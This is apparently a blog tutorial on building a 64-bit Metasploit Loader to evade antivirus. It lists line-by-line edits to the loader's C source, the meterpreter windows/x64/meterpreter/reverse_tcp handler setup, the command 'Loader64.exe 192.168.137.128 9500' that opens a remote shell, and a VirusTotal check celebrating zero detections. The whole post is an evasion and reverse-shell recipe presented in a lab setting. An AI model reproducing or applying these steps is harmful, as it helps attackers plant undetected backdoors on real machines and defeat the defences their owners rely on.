Bypassing AV through Metasploit Loader 64-Bit

This post is continued from a previous post- Bypassing AV through Metasploit Loader 32-Bit.

Here, we are going to use Metasploit Loader 64-Bit to Bypass AntiViruses.

First of all, we will edit the Metasploit Loader 32-Bit to make it compatible for a 64-Bit.

We will be using the RDI Register that takes 10 bytes for 64-Bit, in place of the EDI Register that took 5 bytes in the 32-Bit version.

Note: Hexcode for mov RDI is 48 BF.

To make the executable file we will be using a Dev C++ Tool by Sourceforge, that could be downloaded from the link- Dev C++.

Sourceforge: Dev-C++

• To make sure it is installed correctly, look for the GCC files. It should be having both 32 & 64 GCCs’.

Dev C++

• Make a new Project Loader64 & Save the file as Loader64.
• Set Project as a C Project & application as a Console Application. So, that we can run it from the Command Prompt.

Dev C++

Dev C++

Dev C++

• A new default file, as shown below will be created.
• Replace the default code with the Raw main.c file from Metasploit Loader.

Dev C++

• Copy the Raw File from main.c as shown below, to the new Project Loader64.
• Save the File as Loader64.c.

raw file main.c

• Do the below changes in the file Loader64.c. Since using a 64-Bit will require more bytes to process.
• Line 107- Replace size+ 5-> size+10
• Line 114- add buffer[0] = 0x48; # as mov in hex is 48
• Line 115- add buffer[1] = 0xBF; # as rdi in hex is BF
• Line 118- Replace 1->2 & 4->8
• Line 121- Replace 5->10

Dev C++

Also, put winsock2.h above windows.h. It’s an error in the original code. Refer to the previous post.

Dev C++

• Make Sure Compile Options has -lws2_32

Dev C++

• Now, Compile & Run the code.
• Copy the Loader64.exe to Desktop, for convenience.
• Goto Kali Instance, Start the Multi Handler, which will connect to the Reverse shell from Windows7.
• Use PAYLOAD windows/x64/meterpreter/reverse_tcp
• Set the other options LHOST & LPORT
• Start the Reverse TCP Handler.

Started Reverse TCP Handler

• Goto Windows Instance, Start the command prompt.
• Move to the folder where Loader64.exe is kept.
• Try to run the Loader64.exe from cmd.
• It requires Host & Port values
• Enter the values accordingly, refer to the figure
• Run: Loader64.exe 192.168.137.128 9500
• Check the Handler, a session has been created.

Execute the payload

• Onto Kali Instance, we get a Session.

Meterpreter session

A session has been created by the Metasploit Loader 64 bit, which goes undetected by many of the Antiviruses.

Let’s check the Payload on VirusTotal. If, it will be able to bypass any antiviruses.

• What could be more HeartWarming than, getting a statement- “No engines detected this file”

Antivirus couldn’t detect the payload

• So, yes, the Payload wasn’t detected by VirusTotal, any of the AntiViruses. 👾